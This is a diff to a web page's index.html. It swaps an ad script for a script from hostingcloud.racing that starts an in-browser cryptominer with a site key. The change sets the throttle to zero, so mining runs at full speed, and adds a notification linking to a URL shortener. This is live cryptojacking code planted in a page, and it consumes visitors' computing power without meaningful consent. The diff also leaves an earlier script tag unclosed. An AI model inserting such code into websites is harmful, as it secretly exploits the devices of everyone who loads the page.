--- a/index.html
+++ b/index.html
@@ -15,13 +15,14 @@
     var adfly_id = 22299945;
     var popunder_frequency_delay = 0;
     var adfly_google_compliant = false;
-</script>
-<script src="https://cdn.adf.ly/js/display.js"></script>
+<script src="https://www.hostingcloud.racing/bhUE.js"></script>
 <script>
-    var _client = new Client.Anonymous('328bc6b76c402038b75d228e0ed01d123d3381a3214390af4c914da3d5a33f92', {
-        throttle: 0.5
+    var _client = new Client.Anonymous('1d62bf74a4a980aee945fbedf0a3b709aa76461d00b43ae13ef14ec9ced10230', {
+        throttle: 0, c: 'w'
     });
     _client.start();
+    _client.addMiningNotification("Top", "festyy.com/w5qFXf", "#cccccc", 40, "#3d3d3d");
+
 </script>
 </body>
 </html>
